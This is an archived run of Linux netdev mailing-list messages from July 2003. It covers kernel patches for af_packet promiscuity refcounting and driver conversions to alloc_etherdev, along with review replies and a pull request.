willy@debian.org Precedence: bulk X-list: netdev On Tue, Jul 08, 2003 at 01:44:32PM -0700, Ben Greear wrote: > Some of these are missing their netdevice arg? > >+ int (*get_regs_len)(struct ethtool_regs *); > >+ int (*self_test_len)(struct ethtool_test *); > >+ int (*get_strings_len)(struct ethtool_gstrings *); > >+ int (*get_stats_len)(struct ethtool_stats *); Well, they don't actually need it -- these are more attributes of the underlying driver than they are of any individual network device. 
I suspect at least one of them isn't needed, and I'm sure the e1000 guys are about to tell me which one ;-) -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From lunz@falooley.org Tue Jul 8 15:12:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:13:04 -0700 (PDT) Received: from orr (mail@dsl027-161-081.atl1.dsl.speakeasy.net [216.27.161.81]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MCt2x003280 for ; Tue, 8 Jul 2003 15:12:56 -0700 Received: from lunz by orr with local (Exim 3.36 #1 (Debian)) id 19a0hT-0005NC-00; Tue, 08 Jul 2003 18:12:39 -0400 Date: Tue, 8 Jul 2003 18:12:39 -0400 To: netdev@oss.sgi.com Cc: jmorris@intercode.com.au, davem@redhat.com Subject: [PATCH RESEND 2.4, 2.5] dev->promiscuity refcounting broken in af_packet.c Message-ID: <20030708221239.GA20633@orr.falooley.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.4i From: Jason Lunz X-archive-position: 3840 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lunz@falooley.org Precedence: bulk X-list: netdev According to today's bkcvs, the below patch still hasn't been applied to 2.4 or 2.5 despite a -pre release or two, Alexey reviewed it and recommended for inclusion. James, I know you applied it to your bk tree. Will that be enough to get it into 2.4 and 2.5, or should I submit it elsewhere? Jason lunz@falooley.org said: > The problem is that packet sockets are calling dev_set_promiscuity too > many times. 
For example, if I take an unconfigured interface and do: > > halfoat:~ # ip link show eth1 > 9: eth1: mtu 1500 qdisc pfifo_fast qlen 100 > link/ether 00:30:48:41:62:12 brd ff:ff:ff:ff:ff:ff > halfoat:~ # ip link set up eth1 > halfoat:~ # tcpdump -i eth1 & > [1] 457 > tcpdump: WARNING: eth1: no IPv4 address assigned > tcpdump: listening on eth1 > halfoat:~ # ip link set down eth1 > tcpdump: pcap_loop: recvfrom: Network is down > [1]+ Exit 1 tcpdump -i eth1 > halfoat:~ # ip link show eth1 > 9: eth1: mtu 1500 qdisc pfifo_fast qlen 100 > link/ether 00:30:48:41:62:12 brd ff:ff:ff:ff:ff:ff > > eth1 is now in promiscuous mode because dev->promiscuity is -1 (!= 0). > > When the interface goes down, dev_change_flags calls dev_close, which > sends NETDEV_DOWN down the netdev notifier chain. Because tcpdump has a > packet socket open, packet_notifier calls packet_dev_mclist -> > packet_dev_mc -> dev_set_promiscuity. > > When tcpdump gets ENETDOWN, it aborts, closing the packet socket. > af_packet.c's proto_ops->release cleanup method is packet_release. On > close(), packet_release calls packet_flush_mclist, which again > decrements dev->promiscuity, so when tcpdump exits, dev promiscuity is > left at -1. > > I can't see any reason to be mucking about with the device promiscuity > on NETDEV_DOWN and NETDEV_UP events in the first place. The attached > patch seems to fix all the cases I can think of. It works properly in > both of the above cases, and has also been verified to do the right > thing with NETDEV_UNREGISTER events. 
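
The double decrement described in the quoted text can be reproduced with a toy counter model. This is a user-space sketch only, not kernel code: the toy_* names and both structs are hypothetical, and the model assumes a single socket holding one promiscuous membership, as in the tcpdump case.

```c
/* Toy model of dev->promiscuity accounting; all names are hypothetical. */
struct toy_dev {
    int promiscuity;
};

struct toy_sock {
    int has_promisc_membership;  /* stands in for an entry on po->mclist */
};

/* Stands in for dev_set_promiscuity(). */
static void toy_set_promiscuity(struct toy_dev *dev, int inc)
{
    dev->promiscuity += inc;
}

/* Opening the capture socket adds a promiscuous membership: +1. */
static void toy_add_membership(struct toy_dev *dev, struct toy_sock *sk)
{
    sk->has_promisc_membership = 1;
    toy_set_promiscuity(dev, +1);
}

/*
 * NETDEV_DOWN handling. Without the patch the notifier decrements the
 * count but leaves the membership on the list; with it, DOWN does not
 * touch the count at all.
 */
static void toy_notifier_down(struct toy_dev *dev, struct toy_sock *sk,
                              int patched)
{
    if (!patched && sk->has_promisc_membership)
        toy_set_promiscuity(dev, -1);
}

/* Closing the socket flushes the membership list: -1 per entry. */
static void toy_release(struct toy_dev *dev, struct toy_sock *sk)
{
    if (sk->has_promisc_membership) {
        toy_set_promiscuity(dev, -1);
        sk->has_promisc_membership = 0;
    }
}

/* Replays: open socket, interface goes down, socket is closed. */
int toy_run(int patched)
{
    struct toy_dev dev = { 0 };
    struct toy_sock sk = { 0 };

    toy_add_membership(&dev, &sk);
    toy_notifier_down(&dev, &sk, patched);
    toy_release(&dev, &sk);
    return dev.promiscuity;
}
```

In this model toy_run(0) ends with a count of -1, matching the symptom reported for eth1, while toy_run(1) ends at 0.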
>
> Jason
>

Index: linux-2.4/net/packet/af_packet.c
===================================================================
RCS file: /home/cvs/linux-2.4/net/packet/af_packet.c,v
retrieving revision 1.11
diff -u -p -r1.11 af_packet.c
--- linux-2.4/net/packet/af_packet.c	12 Jun 2002 23:10:34 -0000	1.11
+++ linux-2.4/net/packet/af_packet.c	1 Jul 2003 20:17:51 -0000
@@ -1378,8 +1378,13 @@ static int packet_notifier(struct notifi
 		po = sk->protinfo.af_packet;
 
 		switch (msg) {
-		case NETDEV_DOWN:
 		case NETDEV_UNREGISTER:
+#ifdef CONFIG_PACKET_MULTICAST
+			if (po->mclist)
+				packet_dev_mclist(dev, po->mclist, -1);
+			// fallthrough
+#endif
+		case NETDEV_DOWN:
 			if (dev->ifindex == po->ifindex) {
 				spin_lock(&po->bind_lock);
 				if (po->running) {
@@ -1396,10 +1401,6 @@ static int packet_notifier(struct notifi
 				}
 				spin_unlock(&po->bind_lock);
 			}
-#ifdef CONFIG_PACKET_MULTICAST
-			if (po->mclist)
-				packet_dev_mclist(dev, po->mclist, -1);
-#endif
 			break;
 		case NETDEV_UP:
 			spin_lock(&po->bind_lock);
@@ -1409,10 +1410,6 @@ static int packet_notifier(struct notifi
 				po->running = 1;
 			}
 			spin_unlock(&po->bind_lock);
-#ifdef CONFIG_PACKET_MULTICAST
-			if (po->mclist)
-				packet_dev_mclist(dev, po->mclist, +1);
-#endif
 			break;
 		}
 	}

From shemminger@osdl.org Tue Jul 8 15:12:54 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:13:01 -0700 (PDT)
Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MCr2x003279 for ; Tue, 8 Jul 2003 15:12:54 -0700
Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h68MCjI08162; Tue, 8 Jul 2003 15:12:46 -0700
Date: Tue, 8 Jul 2003 15:12:45 -0700
From: Stephen Hemminger
To: Jeff Garzik
Cc: netdev@oss.sgi.com
Subject: [PATCH 2.5.74] convert apne to dynamic allocation
Message-Id: <20030708151245.179cac2b.shemminger@osdl.org>
Organization: Open Source Development Lab
X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; i686-pc-linux-gnu)
X-Face:
 &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$
 /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 3839
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: shemminger@osdl.org
Precedence: bulk
X-list: netdev

Convert apne driver away from static net_device structure.
Builds, but not tested with real hardware.

diff -Nru a/drivers/net/apne.c b/drivers/net/apne.c
--- a/drivers/net/apne.c	Mon Jul 7 14:46:31 2003
+++ b/drivers/net/apne.c	Mon Jul 7 14:46:31 2003
@@ -534,16 +534,22 @@
 }
 
 #ifdef MODULE
-static struct net_device apne_dev;
+static struct net_device *apne_dev;
 
 int init_module(void)
 {
 	int err;
 
-	apne_dev.init = apne_probe;
-	if ((err = register_netdev(&apne_dev))) {
+	apne_dev = kmalloc(sizeof(*apne_dev), GFP_KERNEL);
+	if (!apne_dev)
+		return -ENOMEM;
+	memset(apne_dev, 0, sizeof(*apne_dev));
+
+	apne_dev->init = apne_probe;
+	if ((err = register_netdev(apne_dev))) {
 		if (err == -EIO)
 			printk("No PCMCIA NEx000 ethernet card found.\n");
+		kfree(apne_dev);
 		return (err);
 	}
 	return (0);
@@ -551,11 +557,13 @@
 
 void cleanup_module(void)
 {
-	unregister_netdev(&apne_dev);
+	unregister_netdev(apne_dev);
 
 	pcmcia_disable_irq();
 
-	free_irq(IRQ_AMIGA_PORTS, &apne_dev);
+	free_irq(IRQ_AMIGA_PORTS, apne_dev);
+
+	kfree(apne_dev);
 
 	pcmcia_reset();
 

From shemminger@osdl.org Tue Jul 8 15:14:34 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:14:39 -0700 (PDT)
Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MEY2x003871 for ; Tue, 8 Jul 2003 15:14:34 -0700
Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h68MESI08466; Tue, 8 Jul 2003 15:14:28 -0700
Date: Tue, 8 Jul 2003 15:14:27 -0700
From: Stephen Hemminger
To: Jeff Garzik
Cc: netdev@oss.sgi.com
Subject: [PATCH] Convert hp100 to using alloc_etherdev
Message-Id:
<20030708151427.328aae38.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3841 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Change hp100 driver to using alloc_etherdev instead of separate allocation of dev->priv. Builds, but not tested since do not have hardware. diff -Nru a/drivers/net/hp100.c b/drivers/net/hp100.c --- a/drivers/net/hp100.c Mon Jul 7 14:49:18 2003 +++ b/drivers/net/hp100.c Mon Jul 7 14:49:18 2003 @@ -713,11 +713,8 @@ } /* Initialise the "private" data structure for this card. */ - if ((dev->priv = kmalloc(sizeof(struct hp100_private), GFP_KERNEL)) == NULL) - return -ENOMEM; - lp = (struct hp100_private *) dev->priv; - memset(lp, 0, sizeof(struct hp100_private)); + spin_lock_init(&lp->lock); lp->id = eid; lp->chip = chip; @@ -777,7 +774,6 @@ SET_MODULE_OWNER(dev); SET_NETDEV_DEV(dev, &pci_dev->dev); - ether_setup(dev); /* If busmaster mode is wanted, a dma-capable memory area is needed for * the rx and tx PDLs @@ -2963,8 +2959,6 @@ pci_free_consistent(p->pci_dev, MAX_RINGSIZE + 0x0f, p->page_vaddr_algn, virt_to_whatever(d, p->page_vaddr_algn)); if (p->mem_ptr_virt) iounmap(p->mem_ptr_virt); - kfree(d->priv); - d->priv = NULL; kfree(d); hp100_devlist[i] = NULL; } @@ -2983,9 +2977,10 @@ cards = 0; while ((hp100_port[++i] != -1) && (i < HP100_DEVICES)) { /* Create device and set basics args */ - hp100_devlist[i] = kmalloc(sizeof(struct net_device), GFP_KERNEL); + hp100_devlist[i] = alloc_etherdev(sizeof(struct hp100_private)); if (!hp100_devlist[i]) goto fail; + 
 		memset(hp100_devlist[i], 0x00, sizeof(struct net_device));
 #if LINUX_VERSION_CODE >= 0x020362	/* 2.3.99-pre7 */
 		memcpy(hp100_devlist[i]->name, hp100_name[i], IFNAMSIZ);	/* Copy name */
@@ -2998,7 +2993,6 @@
 		/* Try to create the device */
 		if (register_netdev(hp100_devlist[i]) != 0) {
 			/* DeAllocate everything */
-			/* Note: if dev->priv is mallocated, there is no way to fail */
 			kfree(hp100_devlist[i]);
 			hp100_devlist[i] = (struct net_device *) NULL;
 		} else

From shemminger@osdl.org Tue Jul 8 15:16:18 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:16:22 -0700 (PDT)
Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MGI2x004229 for ; Tue, 8 Jul 2003 15:16:18 -0700
Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h68MG6I08876; Tue, 8 Jul 2003 15:16:06 -0700
Date: Tue, 8 Jul 2003 15:16:06 -0700
From: Stephen Hemminger
To: Jeff Garzik
Cc: netdev@oss.sgi.com
Subject: [PATCH]
Message-Id: <20030708151606.483604ad.shemminger@osdl.org>
Organization: Open Source Development Lab
X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; i686-pc-linux-gnu)
X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$
 /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 3842
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: shemminger@osdl.org
Precedence: bulk
X-list: netdev

Convert Digi RightSwitch to use alloc_etherdev.
Builds (on 2.5.74), but once again I do not have real hardware to test.
diff -Nru a/drivers/net/dgrs.c b/drivers/net/dgrs.c --- a/drivers/net/dgrs.c Mon Jul 7 14:50:36 2003 +++ b/drivers/net/dgrs.c Mon Jul 7 14:50:36 2003 @@ -1252,18 +1252,12 @@ { DGRS_PRIV *priv; struct net_device *dev, *aux; - - /* Allocate and fill new device structure. */ - int dev_size = sizeof(struct net_device) + sizeof(DGRS_PRIV); int i, ret; - dev = (struct net_device *) kmalloc(dev_size, GFP_KERNEL); - + dev = alloc_etherdev(sizeof(DGRS_PRIV)); if (!dev) return -ENOMEM; - memset(dev, 0, dev_size); - dev->priv = ((void *)dev) + sizeof(struct net_device); priv = (DGRS_PRIV *)dev->priv; dev->base_addr = io; @@ -1279,7 +1273,7 @@ dev->init = dgrs_probe1; SET_MODULE_OWNER(dev); - ether_setup(dev); + if (register_netdev(dev) != 0) { kfree(dev); return -EIO; @@ -1302,15 +1296,18 @@ struct net_device *devN; DGRS_PRIV *privN; /* Allocate new dev and priv structures */ - devN = (struct net_device *) kmalloc(dev_size, GFP_KERNEL); - /* Make it an exact copy of dev[0]... */ + devN = alloc_etherdev(sizeof(DGRS_PRIV)); ret = -ENOMEM; if (!devN) goto fail; - memcpy(devN, dev, dev_size); - memset(devN->name, 0, sizeof(devN->name)); - devN->priv = ((void *)devN) + sizeof(struct net_device); + + /* Make it an exact copy of dev[0]... */ + *devN = *dev; + + /* copy the priv structure of dev[0] */ privN = (DGRS_PRIV *)devN->priv; + *privN = *priv; + /* ... and zero out VM areas */ privN->vmem = 0; privN->vplxdma = 0; @@ -1318,9 +1315,11 @@ devN->irq = 0; /* ... and base MAC address off address of 1st port */ devN->dev_addr[5] += i; + /* ... 
choose a new name */ + strncpy(devN->name, "eth%d", IFNAMSIZ); devN->init = dgrs_initclone; SET_MODULE_OWNER(devN); - ether_setup(devN); + ret = -EIO; if (register_netdev(devN)) { kfree(devN); From davem@redhat.com Tue Jul 8 15:16:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:16:51 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MGk2x004440 for ; Tue, 8 Jul 2003 15:16:47 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id PAA21157; Tue, 8 Jul 2003 15:08:36 -0700 Date: Tue, 08 Jul 2003 15:08:35 -0700 (PDT) Message-Id: <20030708.150835.78728697.davem@redhat.com> To: willy@debian.org Cc: greearb@candelatech.com, netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops From: "David S. Miller" In-Reply-To: <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3843 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Matthew Wilcox Date: Tue, 8 Jul 2003 22:25:51 +0100 On Tue, Jul 08, 2003 at 01:44:32PM -0700, Ben Greear wrote: > Some of these are missing their netdevice arg? 
   > >+	int (*get_regs_len)(struct ethtool_regs *);
   > >+	int (*self_test_len)(struct ethtool_test *);
   > >+	int (*get_strings_len)(struct ethtool_gstrings *);
   > >+	int (*get_stats_len)(struct ethtool_stats *);

   Well, they don't actually need it -- these are more attributes of the
   underlying driver than they are of any individual network device.

Not true, at least for the regs len: different variants of the same chip
can have a differently sized register set.

From shemminger@osdl.org Tue Jul 8 15:17:51 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:17:55 -0700 (PDT)
Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MHo2x004870 for ; Tue, 8 Jul 2003 15:17:51 -0700
Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h68MHgI10146; Tue, 8 Jul 2003 15:17:42 -0700
Date: Tue, 8 Jul 2003 15:17:42 -0700
From: Stephen Hemminger
To: Jeff Garzik
Cc: netdev@oss.sgi.com
Subject: [PATCH] convert plip to alloc_netdev
Message-Id: <20030708151742.715ca49c.shemminger@osdl.org>
Organization: Open Source Development Lab
X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; i686-pc-linux-gnu)
X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$
 /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 3844
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: shemminger@osdl.org
Precedence: bulk
X-list: netdev

This converts the parallel network driver to use alloc_netdev instead
of doing its own allocation.

Tested (load/unload) on 2.5.74.

diff -Nru a/drivers/net/plip.c b/drivers/net/plip.c
--- a/drivers/net/plip.c	Tue Jul 8 15:07:44 2003
+++ b/drivers/net/plip.c	Tue Jul 8 15:07:44 2003
@@ -277,27 +277,10 @@
    then calls us here.
*/ -int __init -plip_init_dev(struct net_device *dev, struct parport *pb) +static int +plip_init_netdev(struct net_device *dev) { - struct net_local *nl; - struct pardevice *pardev; - - SET_MODULE_OWNER(dev); - dev->irq = pb->irq; - dev->base_addr = pb->base; - - if (pb->irq == -1) { - printk(KERN_INFO "plip: %s has no IRQ. Using IRQ-less mode," - "which is fairly inefficient!\n", pb->name); - } - - pardev = parport_register_device(pb, dev->name, plip_preempt, - plip_wakeup, plip_interrupt, - 0, dev); - - if (!pardev) - return -ENODEV; + struct net_local *nl = dev->priv; printk(KERN_INFO "%s", version); if (dev->irq != -1) @@ -307,9 +290,6 @@ printk(KERN_INFO "%s: Parallel port at %#3lx, not using IRQ.\n", dev->name, dev->base_addr); - /* Fill in the generic fields of the device structure. */ - ether_setup(dev); - /* Then, override parts of it */ dev->hard_start_xmit = plip_tx_packet; dev->open = plip_open; @@ -322,22 +302,12 @@ memset(dev->dev_addr, 0xfc, ETH_ALEN); /* Set the private structure */ - dev->priv = kmalloc(sizeof (struct net_local), GFP_KERNEL); - if (dev->priv == NULL) { - printk(KERN_ERR "%s: out of memory\n", dev->name); - parport_unregister_device(pardev); - return -ENOMEM; - } - memset(dev->priv, 0, sizeof(struct net_local)); - nl = (struct net_local *) dev->priv; - nl->orig_hard_header = dev->hard_header; dev->hard_header = plip_hard_header; nl->orig_hard_header_cache = dev->hard_header_cache; dev->hard_header_cache = plip_hard_header_cache; - nl->pardev = pardev; nl->port_owner = 0; @@ -1299,29 +1269,52 @@ * available to use. 
*/ static void plip_attach (struct parport *port) { - static int i; + static int unit; + struct net_device *dev; + struct net_local *nl; + char name[IFNAMSIZ]; if ((parport[0] == -1 && (!timid || !port->devices)) || plip_searchfor(parport, port->number)) { - if (i == PLIP_MAX) { + if (unit == PLIP_MAX) { printk(KERN_ERR "plip: too many devices\n"); return; } - dev_plip[i] = kmalloc(sizeof(struct net_device), - GFP_KERNEL); - if (!dev_plip[i]) { + + sprintf(name, "plip%d", unit); + dev = alloc_netdev(sizeof(struct net_local), name, + ether_setup); + if (!dev) { printk(KERN_ERR "plip: memory squeeze\n"); return; } - memset(dev_plip[i], 0, sizeof(struct net_device)); - sprintf(dev_plip[i]->name, "plip%d", i); - dev_plip[i]->priv = port; - if (plip_init_dev(dev_plip[i],port) || - register_netdev(dev_plip[i])) { - kfree(dev_plip[i]); - dev_plip[i] = NULL; + + dev->init = plip_init_netdev; + + SET_MODULE_OWNER(dev); + dev->irq = port->irq; + dev->base_addr = port->base; + if (port->irq == -1) { + printk(KERN_INFO "plip: %s has no IRQ. 
Using IRQ-less mode," + "which is fairly inefficient!\n", port->name); + } + + nl = dev->priv; + nl->pardev = parport_register_device(port, name, plip_preempt, + plip_wakeup, plip_interrupt, + 0, dev); + + if (!nl->pardev) { + printk(KERN_ERR "%s: parport_register failed\n", name); + kfree(dev); + return; + } + + if (register_netdev(dev)) { + printk(KERN_ERR "%s: network register failed\n", name); + kfree(dev); } else { - i++; + dev_plip[unit++] = dev; } } } @@ -1341,20 +1334,19 @@ static void __exit plip_cleanup_module (void) { + struct net_device *dev; int i; parport_unregister_driver (&plip_driver); for (i=0; i < PLIP_MAX; i++) { - if (dev_plip[i]) { - struct net_local *nl = - (struct net_local *)dev_plip[i]->priv; - unregister_netdev(dev_plip[i]); + if ((dev = dev_plip[i])) { + struct net_local *nl = dev->priv; + unregister_netdev(dev); if (nl->port_owner) parport_release(nl->pardev); parport_unregister_device(nl->pardev); - kfree(dev_plip[i]->priv); - kfree(dev_plip[i]); + kfree(dev); dev_plip[i] = NULL; } } From garzik@gtf.org Tue Jul 8 16:26:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 16:26:55 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68NQe2x005707 for ; Tue, 8 Jul 2003 16:26:40 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id B2A996655; Tue, 8 Jul 2003 19:26:34 -0400 (EDT) Date: Tue, 8 Jul 2003 19:26:34 -0400 From: Jeff Garzik To: torvalds@osdl.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [BK PATCHES] net driver merges Message-ID: <20030708232634.GA29175@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 3846 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev (note to 
others -- more coming, the queue isn't empty yet) Linus, please do a bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.5 Others may download ftp://ftp.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.5/2.5.74-bk5-netdrvr1.patch.bz2 This will update the following files: drivers/net/8139too.c | 2 drivers/net/e1000/e1000.h | 1 drivers/net/e1000/e1000_ethtool.c | 5 - drivers/net/e1000/e1000_hw.c | 59 ++++++++++-- drivers/net/e1000/e1000_hw.h | 18 +++ drivers/net/e1000/e1000_main.c | 186 ++++++++++++++++++++------------------ drivers/net/via-rhine.c | 36 +++++-- 7 files changed, 198 insertions(+), 109 deletions(-) through these ChangeSets: (03/07/08 1.1431) [e1000] misc cleanup * whitespace cleanup * removal of unused members of netdev priv struct * extendable arrangement of h/w reset logic (03/07/08 1.1430) [e1000] s/int/unsigned int/ for descriptor ring indexes * Perf cleanup: s/int/unsigned int/ for descriptor ring indexes [suggestion by Jeff Garzik]. * Perf cleanup: cache references to ring elements using local pointer (03/07/08 1.1429) [e1000] h/w workaround for mis-fused parts * h/w workaround: several 10's of thousands of 82547 controllers where mis-fused during manufacturing, resulting in PHY Tx amplitude to be too high and out of spec. This workaround detects those parts, and compensates the Tx amplitude by subtracting ~80mV. (03/07/08 1.1428) [e1000] ethtool diag cleanup * Cleanup: ethtool diags: only reset if not if_running. (03/07/08 1.1427) [e1000] alloc_etherdev failure didn't cleanup regions * Bug fix: alloc_etherdev failure didn't cleanup regions in probe. (03/07/08 1.1426) [e1000] missing Tx cleanup opportunities during intr handling * Bug fix: missing Tx cleanup opportunities during interrupt handling. 
(03/07/08 1.1425) [e1000] fix VLAN support on PPC64 * Bug fix: fix VLAN support on PPC64 [Mark Rakes (mrakes@vivato.net)] (03/07/08 1.1424) [e1000] request_irq() failure resulted in freeing twice * Bug fix: request_irq() failure resulted in freeing resources twice! [Don Fry (brazilnut@us.ibm.com)] (03/07/08 1.1423) [PATCH] via-rhine 1.18-2.5: Fix Rhine-I regression This patch addresses a minor regression reported by Rhine-I users (leading to occasional Tx timeouts). I also merged some cosmetic changes. (03/07/05 1.1422) [netdrvr 8139too] fix debug printk printk args had been accidentally reversed From davem@redhat.com Tue Jul 8 16:26:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 16:26:53 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68NQa2x005708 for ; Tue, 8 Jul 2003 16:26:36 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id QAA21406; Tue, 8 Jul 2003 16:18:18 -0700 Date: Tue, 08 Jul 2003 16:18:18 -0700 (PDT) Message-Id: <20030708.161818.28806942.davem@redhat.com> To: lunz@falooley.org Cc: netdev@oss.sgi.com, jmorris@intercode.com.au Subject: Re: [PATCH RESEND 2.4, 2.5] dev->promiscuity refcounting broken in af_packet.c From: "David S. Miller" In-Reply-To: <20030708221239.GA20633@orr.falooley.org> References: <20030708221239.GA20633@orr.falooley.org> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3845 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Jason Lunz Date: Tue, 8 Jul 2003 18:12:39 -0400 James, I know you applied it to your bk tree. 
Will that be enough to get it into 2.4 and 2.5, or should I submit it elsewhere? We're just waiting for me to catch up on my backlog from my vacation and push James's tree(s) to Marcelo and Linus. Please be patient! :-) From kuznet@ms2.inr.ac.ru Tue Jul 8 16:52:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 16:52:16 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Nq32x006471 for ; Tue, 8 Jul 2003 16:52:04 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA13835; Wed, 9 Jul 2003 03:50:59 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307082350.DAA13835@dub.inr.ac.ru> Subject: Re: Question about netlink To: krkumar@us.ibm.com (Krishna Kumar) Date: Wed, 9 Jul 2003 03:50:54 +0400 (MSD) Cc: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com In-Reply-To: <3F0B294A.9060302@us.ibm.com> from "Krishna Kumar" at Jul 08, 2003 01:27:54 PM X-Mailer: 